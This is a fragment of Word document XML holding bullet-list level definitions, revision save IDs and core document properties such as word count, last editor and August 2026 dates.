    <w:lvl w:ilvl="6" w:tplc="B9A0D124">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="CA7CA5D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A90E047E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="59065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1C8"/>
    <w:rsid w:val="00834B69"/>
    <w:rsid w:val="00B13552"/>
    <w:rsid w:val="00BF1CB2"/>
    <w:rsid w:val="00CC60C9"/>
    <w:rsid w:val="00E501C8"/>
    <w:rsid w:val="00E769A8"/>
    <w:rsid w:val="00F10F35"/>
    <w:rsid w:val="00FB2E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A965E"/>
  <w15:docId w15:val="{9E3A97B2-89F3-45B1-B51F-ACC95DB08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1252</Words>
  <Characters>7141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SHARMA</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-01T09:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-11T04:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>